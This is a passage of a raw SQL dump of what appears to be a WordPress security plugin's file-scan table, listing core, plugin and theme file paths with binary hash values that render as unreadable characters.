̫','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/class-fw-ext-builder-templates.php',0,'���Ţ\r��?\'�#','���Ţ\r��?\'�#','?�::��[-�N%�Y��b�c��ŻL�b��о','',0,'?'),(']�>t�fd�X�zyy�_(','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-glacier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Fa�\"\02�','�����hk����l���� ��v��	Q���yg','',0,'?'),(']�d��+�X�׃w�','wp-content/themes/vega/sample/images/full-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�E�l���Y�\\��','ż��q��3���^\"}R2Y��L���/','',0,'?'),(']���r�:@��I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6:����2kP3���','%u���Mp����,.\0�@�Zq��r��/���Q','',0,'?'),(']����c1���O����','wp-content/plugins/wordpress-seo/wp-seo.php',0,'���W�Y�\Z�$]','���W�Y�\Z�$]','\Z�(��A%��z�u�l����fC����S���','',0,'?'),(']�Ȉ�����Ϡb�','wp-content/plugins/wordpress-seo/js/dist/wp-seo-admin-media-350.min.js',0,'y�?6�L�s�-��m','y�?6�L�s�-��m','GN!���.��z�C坯�d|��u��ܞ','',0,'?'),(']��P���Tkvt��8A','wp-admin/network/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ż\Z�=>� ɱ�l�','y�TQmU��z�D��s�g���1^T\"�ig�I','',0,'?'),(']���*������J�','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��E��H)�.��','��& �qC1QU�_.O��3����1!&��۴��','',0,'?'),(']����\"}[�Y�R�','wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W��a�y�8^t�!g','���e��s�zG�P�[��$�]��r���/�)\'�','',0,'?'),(']��	\0�w��	h��','wp-content/themes/sg-window/img/icons/friendster.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uٰ��\"��@=A','��w��Ra\Z��Ub.��\n�a�5?��1$oF.�&','',0,'?'),(']�����W��]�#','wp-content/plugins/spam-captcha/core/css/translation_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>ҝL�(����\0ϙK�','mo��(�����I���\0<�9W�-�Oƒ6�','',0,'?'),(']�S 1�&�~�>)','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-theme-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�U��f�͎a��N�','W��.�QvqEC]9&��$�	ڑ��i��A','',0,'?'),(']��FF�aW��º��','wp-content/plugins/spam-captcha/lang/spam_captcha-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Inh��&��5��S���','�QK�xdt�-x�C�f�A����L��\'','',0,'?'),(']ѧ�	Ux�ڸ(\0�r�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.enom.php',0,'���Rrէ�v�pfd�','���Rrէ�v�pfd�','�t�㮞�#�<H/�zo�yGb`X���7_�','',0,'?'),(']�??仈hD,�+ Z��','wp-content/themes/hueman/assets/admin/img/col-3cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�Ya%��@nk�%̩b�','!�y/�$�L�G�h$�}Y�k1��ZV�','',0,'?'),(']��\nS�Pz�,���%�','wp-content/plugins/spam-captcha/core/lang/SL_framework-ar_JO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B�����.s�p','	���ٞAz�.MAd�Ԥ�m9d@tb�\\U\n��r�','',0,'?'),(']�-���ozڹ<��O�','wp-content/themes/illdy/layout/js/owl-carousel/owl-carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쑿�Vb�� ��@Zj�','1{�xا1����HX;_��1�J$�w7��','',0,'?'),(']�-Nʴ9�q.��O�','wp-content/themes/relia/inc/tgm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dc	���h��y^g^','8�E���ɬC�?_��2�\nv6��!�E%��OU','',0,'?'),(']�MF*��\'�l�o8�','wp-content/themes/point/images/gravatar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�*�18�ƮN�','ƈlC����C������V��/F���J��6ox�','',0,'?'),('^�4�j�|��I��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�H*f��$��ʝӐ','���Ɲic�z�P��1�\"ݢӛo�TWry�*F','',0,'?'),('^,\"I >V#\0���v','wp-content/themes/wen-business/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �����Gc`o���N','����L����p��t,>#�A�Q���%p�','',0,'?'),('^e�Z�q5�ЭW{N�M','wp-content/themes/verbosa/resources/styles/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�{��i%P���L)e','t�m\0�ˮF�K{8\'ܰ��wh��S}QET��','',0,'?'),('^&��B)��:g�$�A:�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_panels.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(ֱ����R��}]','�i�J(S\r+��%K�/�)��\n��›�����3�','',0,'?'),('^(�?�t�p���,$�','wp-includes/block-patterns/large-header-button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\r��\Z�&o�r\'���','\0�9�w�i����5�������}���h��','',0,'?'),('^9(-(Ų�y ���0q*','wp-admin/user/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�N ����9�3nDl','r���R89�<�;9i1l�Z���Q��oC#�Y��','',0,'?'),('^;�\'�\'�<c\ne��','wp-content/themes/supernews/assets/js/supernews-custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?��@(����\Z�y�','zf6���;����[Fiy�_y�d�+W7�','',0,'?'),('^@ղ{\'��_���92','wp-admin/upgrade-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[a�@1.��Q��Z','�tˁ�����9{��/��y�g1\'�uV��l�','',0,'?'),('^D�V����!o�$+','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-icons_2e83ff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�y�%I�*','��m�\n�.���t��J*eU;�fW��\Z\"R/?','',0,'?'),('^F\"��.�Di�B�R�','wp-content/themes/relia/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qĻ���eP�3�h]�','�������c�Bs	�:��<�ƺ;��R','',0,'?'),('^H\0�B|��4�@z��','wp-includes/IXR/class-IXR-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('^I�f�k8>6ȿ�\0y�','wp-content/themes/alpha-store/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|n���p��v&�','�1+<K�M��˷F@&R̲���t|a==m��R�','',0,'?'),('^M>�.�C�O�h�b','wp-content/themes/fabulous-fluid/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�}��˯��F���','����ORe�n����fj6�;��\"��~7\r','',0,'?'),('^Ox`�]����;�_��','wp-content/themes/clean-magazine/images/gallery/featured3-350x263.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3sO<>�����\n','��p��1�ct+���(�:�p0pB���+','',0,'?'),('^PN}�g�Վ峴�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.directnic.php',0,'��r�Q�f!aQ�o','��r�Q�f!aQ�o','&����`�sB��|*?�7\\g�c\'���','',0,'?'),('^U�.i��ypG���','wp-includes/js/mediaelement/mediaelementplayer-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('^Y�M���z��g','wp-content/themes/tortuga/css/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;(H��-Jht�x�','��;�m��}������e(~�y0m�=�},','',0,'?'),('^d?e��.o���ʨ�L','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�C�=sy3�L���','�_��o3�t�Y��_o��f2k#��0�6Ps;','',0,'?'),('^yG=ڜFg;3�á�','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RC���Ty�?�','D����H�~����Ϩ�P�_�{�!��','',0,'?'),('^{h��N���]D2f�','wp-content/themes/alpha-store/lib/cmb_extension/js/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`@װ	8�-.A+˴�','�c�C��l6݌�#.(�u��L�2ʑ�O� �','',0,'?'),('^�Ð��+�y|�','wp-includes/images/crystal/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('^��MH\nB���q�	','wp-content/themes/supernews/acmethemes/customizer/header-options/header-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��co�IZ8;����','���4dꨵ��*�#p �(t�Bc�h�s�\r�w��','',0,'?'),('^���c}L�I�#��','wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�̨�!�[�ᅲ|[','��l�v[�%AhZ��R�I�l(,A�k��17�CZh','',0,'?'),('^�O���̳�d����','wp-content/themes/hueman/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���R���/(or�b','�p��@��C�%�ŗ\"��9�\">ִ�/','',0,'?'),('^�Qj��j2“|I','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/service/Google_Utils.php',0,'�[W���FgԴ�	�2�','�[W���FgԴ�	�2�','oe�@e�9���2�T��e>�q�\nw)�����9�','',0,'?'),('^�е\'A��=���]�','wp-content/themes/mh-magazine-lite/languages/pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}c�>�Vu�dq��','�����%��&4��UJB\ZX��C�s�顆�3','',0,'?'),('^��<ne����m0�','wp-content/plugins/spam-captcha/lang/spam_captcha-tr_TR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��%�����跻','Zg��H��V�(�@K�>�vʘ�*�}�\Zܿ�m�','',0,'?'),('^�7h���\ZYl��v�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.tvcorp.php',0,'�Ry�?��޾��f�ݏ','�Ry�?��޾��f�ݏ','�y�\Zyg	�@e[�P��[7��t�w��t��','',0,'?'),('^��2�7}�����I��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^ь�����{�O�','vZ���d¥���bNpz04\\��\ZL��I��v�','',0,'?'),('^��u�u��W�d�M=�','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=E�o0��[�','�m?\Z�\"�g��=�0�N\"��Q��`�u\'��~I','',0,'?'),('^�D��\Z�ν�����','wp-content/plugins/unyson/framework/includes/option-types/addable-box/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�k�!�ʨm�����','4m�<E�2��n����%,k u�j����','',0,'?'),('^ǿ��+C%K��x�','wp-content/themes/twentytwentyone/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����WE�Ku�-�,�','X�6~�<��i�0��e��M�R���a��=�6','',0,'?'),('^�@��B��.��V�o','wp-content/themes/clean-magazine/js/source/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!E��fC�5','�]`��30���ngsˁ�&����S�xnFF�','',0,'?'),('^����JA�m�b�','wp-content/themes/sg-window/page-templates/left-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�ٜcz�h2����','��	�qP��o�xۛ�f�92}��f�sK�','',0,'?'),('^�����O��\'���M�','wp-content/themes/illdy/layout/fonts/font-awesome/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=�W���b&�W','�}�.�����$]���%�0��R�Y�Sy�','',0,'?'),('^�^\\Q��=(w��','wp-includes/js/imagesloaded.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('_�\0��d �MP~��D','wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pق�g�OVjX�����','�4k�B�3S��������\"���\ZBG�ǎ\0KV','',0,'?'),('_�k4�!*}��݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|%��*T*�`�','�����289v�u3�n	C2�s��va/�','',0,'?'),('_S8����Uwޱ�','wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/js/images-only.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȗV{�ۑ-M#�w��','��M��v�t��R+��\"t���.�\'��{����','',0,'?'),('_�/��ɧ���y8','wp-content/themes/illdy/layout/images/front-page/front-page-testimonial-4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	]����\".��W�','-*T;��J�HI��лփ3�Nd�)�9xF�\'!V�','',0,'?'),('_*�⽞L�0�>\r','wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN+�5	��O?','�@!�`C��*Me��z�j@	�@���L�jw�','',0,'?'),('_�#��U1p�GS�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���rt��w��(�e','�ҿD�I<�^�i2dW�]G�_�-+�A8�W','',0,'?'),('_3>�����R���','wp-content/themes/tortuga/inc/widgets/widget-magazine-posts-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Qn~X�?\n*}�y�=��','\r$c¨�[��������q	�ǽ]l���<_b(�','',0,'?'),('_B��\0��r�p�Iu��','wp-content/themes/twentynineteen/sass/variables-site/_structure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�!��Y�r8ܗt/�','=�\0t��d\n�J��e�ܐ��Z<��s�n6��t�','',0,'?'),('_Q\ZO8��E�m;En�^','wp-content/themes/nirvana/admin/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���\n��?l.�=r�','�|�H-��y���9@$K�ׂ_��4�Mڜ��','',0,'?'),('_j��_��/���yӱ','wp-includes/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.�[��OAk�F','#��H��ZH�I�M��g���aD\n^�d\\','',0,'?'),('_m\\��*zA��g����','wp-content/themes/square/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P����~��{E','^�?�HV�Re,H��;<�roRr[�WCW��E�','',0,'?'),('_|`����#�Q澨�','wp-content/themes/alpha-store/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0U��k.�g��hZ�','N(F�q���<*g���~�=�y�qj*DX��','',0,'?'),('_�z�$/H���1ɏ,�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.en-AU.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�`?���3p>u','E#\"K\"�,���g����6�S�W5��(���','',0,'?'),('_�}�ËJqm_#Ls*','wp-content/plugins/all-in-one-wp-migration/lib/controller/class-ai1wm-feedback-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z���@2gg��v� ','�7�	GZ�_��t&՚���\"�^6�uf�ݩ','',0,'?'),('_�L��ʩ�z�v�[d','wp-content/plugins/unyson/framework/includes/option-types/wp-editor/includes/class-fw-wp-editor-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������f]�d�L)','7�.���j�����SV��%�Ũ�X��:f','',0,'?'),('_��l`���<�}��','wp-content/themes/fabulous-fluid/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��:�3��\0@\Z)','&�i��f��֌�>��<�_͏��K�Am�4*','',0,'?'),('_�3l���!pY^��','wp-content/themes/barletta/css/images/bx_loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kP�k lf�`�F','xe���z�:��\Z��{�@xnj�~Q&#f�','',0,'?'),('_��E�I\\ٕ--P�0','wp-content/themes/barletta/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/#��&�z0�WBO','��Q\"��!�g�s��������8�|�a�','',0,'?'),('_�|��T�M^���J','wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oLȨ\\0�lI=�)���','�A�f���=fm�y�N����U�\Z4��&A�','',0,'?'),('_��4�3���=��','wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('_�(�C���M6�9�','wp-admin/includes/class-wp-links-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԝ�G0Q`� �_RT\'�','���\\��U�E�ǣw~ԝ��t�|BN��ʵ��j\0','',0,'?'),('_�ܩ6L��J��wy','wp-content/plugins/spam-captcha/core/lang/SL_framework-el_GR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vc��v�SE2B)���ju','���#��4$m�W���8����4�!��Y�','',0,'?'),('_����8}���?�','wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ӏa\07��&�]','op�T�d}�?r���\\�.tS���i�܈','',0,'?'),('`���4�%�K�l��','wp-content/plugins/unyson/framework/static/libs/typcn/fonts/typicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��h�?d�|��','�)�_�%!�:��i8\0\Zm��U,��eSZ\r','',0,'?'),('`��S�`NI�^G�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�i@�G�g��0�p','G��<�/�14Ņ�L��5�������!','',0,'?'),('`��a�}��!��k�3','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_responsive-embed.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',pW٩	��k�L�1','��J�T�j��5\n\'�k!r�\r3����C���','',0,'?'),('`\"�5B�2Ȑ�7�\'','wp-content/themes/supernews/acmethemes/hooks/related-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@�A\\nJ^�^��','��\"�CV���ɰ\nۛ�j}�㵯�	�\'�^�A','',0,'?'),('`$�i.���<$�:��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/handler.template.php',0,'E:J�@�+C�`\\���','E:J�@�+C�`\\���','�+ݪ�M�@7��5	zn/�R�+T��o��','',0,'?'),('`%�ֽ�j��\'��P��','wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�}׬�\0.Vϻ9�5�','�2�oo�^��6#�=��`0>z�ª)b葙e1�N','',0,'?'),('`*��u ���s=��','wp-content/themes/supernews/assets/library/bxslider/css/jquery.bxslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�DZ��-yщXئ�r�','��C�R��8�G�ǬQ-�p��Y#�0�@j��M','',0,'?'),('`0���m#�Y���U��[','wp-content/themes/vega/parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$��<z{���','�H�}��]��Z�tgL<Hg��f�ZGmG��0�m','',0,'?'),('`3 ��J܈v�b{$�s','wp-content/themes/vega/sample/images/featured-image-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BG��yxBmR��UnH','@M=�bv�BYW�W�:z{��\Z�o���S��','',0,'?'),('`;ѫ���hD�o��:�','wp-content/themes/aqueduct/magazine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:op����{\'','�\0����z�����K�{)PO��ǥW�S��m','',0,'?'),('`Y`����\'���l�X','wp-content/plugins/dw-social-share/assets/img/style-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��h��\n���\0�','�&]���Ύ��K1i�f�^�}��1�/�����v','',0,'?'),('`^׈1�T4A��` �7_','wp-content/themes/nirvana/admin/sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H(>��A%|��@','1��f�&h��(�E���}�R1U�]L�֯H�','',0,'?'),('`t����_O0:�.<','wp-content/plugins/unyson/framework/extensions/backups/includes/log/view.php',0,'S�7�t�EB�դ�^�\r','S�7�t�EB�դ�^�\r','�C=;�6w��\'R�?���ҧ\"�(�:�?`���','',0,'?'),('`}��)���(պ{�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_hide-text.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�X�>�<���Ƒ��','�~͖~c�s,�n[?�;{�\Z������c��','',0,'?'),('`��o�\'�c?��/ �','wp-content/themes/twentynineteen/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�-�mם�]�','�I\Z�{��!��M}OL�bdpO���hV�Û�','',0,'?'),('`��\n���2����','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3u����/c�\0TB-�','���4I�\n�7�o^\Z����ڬ���V�rt\nG','',0,'?'),('`�ap`F�5�`�C�d�O','wp-content/themes/travelify/languages/el.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L���ln�ɇT�f_','Sϳ�~6�J��7S��(D�L�0�<q�\0','',0,'?'),('`�\n4� �tidx[�,�W','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/external/URITemplateParser.php',0,'܂��BH�K�;�^i�','܂��BH�K�;�^i�','�>��:��~�Ug?@�s�I\'c]m7)8���r','',0,'?'),('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��wG\"{[�L��x\'D','�ol�����8_kR��5?=R�2�{X�#N','',0,'?'),('`��4�	�����ee1','wp-content/themes/illdy/inc/customizer/panels/testimonials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�i��\r�[�\'���g�','λƫ,����6�dT~R429�X\r�Z�','',0,'?'),('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	>�U6ƪg��v�f','R�&sX$6#���_��ν�J�|�b0�o','',0,'?'),('`��t���laɹ��F�','wp-content/themes/lightly/js/vendor/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:���n�6�H�','2�c�^�a�j���J�׊���� h��3��p�','',0,'?'),('`ȇT�J��Ei�4��','wp-content/themes/verbosa/cryout/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[˷��ix�	��o��','�Hü\\Ř�hx�aű4\'�;L;FP%4���','',0,'?'),('`�r�Vԩh/-�B\n��','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/wp-shortcodes.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\yt�3���{+V','FT���#\Z-�v2-�c� �h���m���a�A','',0,'?'),('`����b`8�j��i','wp-content/themes/verbosa/cryout/admin-functions.php',0,'b�=��`~�#��d6j4','b�=��`~�#��d6j4','����(L�s9<���M�vQut�Zۘ\n�S2�x','',0,'?'),('`�3|A�E��2��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.ascio.php',0,'�Zb~��a�d�}\"','�Zb~��a�d�}\"','�	c��h�lƚ�H��a�l�Q�N	��\"�r8','',0,'?'),('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�8û�Td�h9�\Z','��g�n\\�y|�TR�xF����\\��A��&7֏�d','',0,'?'),('a\0R��*@ ���\\O','wp-content/themes/hueman/functions/czr/modules/modules-resources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LidaѺ��\\��\r�b','J//�g�����Y[bO�蚙��%[����t��','',0,'?'),('a�)6����ю�','wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('a�o�ǠZn���\n','wp-content/themes/skt-construction-lite/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P.�M<�����Q#\n�','O-r�rY�O���ga�/�- <��҄i2h�','',0,'?'),('aS��$�Ң�g��`�','wp-content/themes/mh-magazine-lite/languages/es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�p�3���76��a','�Ș	5��f��ࣹ��[W���5���w��Y`','',0,'?'),('a\"V�Ž���F%ۘ4','wp-content/themes/precious-lite/images/hr_double.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`e�7���=��q�i','$��Ѝ��o���}�?�3\Z�+_�)��d�','',0,'?'),('a(�\0�\'~��u����W','wp-content/plugins/wordpress-seo/images/index.php',0,'EЛ��O0��c���Ag3','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY ����V�Z��Gen�_','',0,'?'),('a.I��c�tR��s.�','wp-content/plugins/contact-form-7/includes/controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�E��UG�v�?U�','���LMC����̜L�W@��B���ڽ>���R','',0,'?'),('a4=ݟ��5L7 .G�w	','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.kr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k��\0�[�#N�7e','��\0�V���T�0}#�w���ÁI>}�j���','',0,'?'),('aB�.�p�U��}�!�','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-directory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�8Kܺ�m��0-]�','AS]��pP�M�?��}��<��m?!�Vh�y','',0,'?'),('aF�U�����r�Mk','wp-content/plugins/unyson/framework/extensions/update/includes/classes/class--fw-ext-update-extensions-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�W<`jW#���Hi�|','8%�!5%uA5�_����g}��d2�1���W�A�','',0,'?'),('aJ5i]�«Ě+�lg','wp-content/themes/morfeu/assets/js/libs/scrollreveal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\n�J_$*�� ~Cp�','k�o\Z�\n%Q�ORƀ(^��6hCȢ�;��y�\n�','',0,'?'),('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4^&$o��uf&�','�wWd¼8P�F6�A����ܴ�to-��X\\��a$','',0,'?'),('ad2IO��&d�Gp���','wp-content/themes/supernews/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ar����;�Z�\n��','*;�0-@�|a�PR`�01��g@9���=��','',0,'?'),('apͺ�5��lѕ�I���','wp-content/themes/mh-magazine-lite/languages/it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C٩0���\\R�寮:','�a$�R�.��_�~E�e���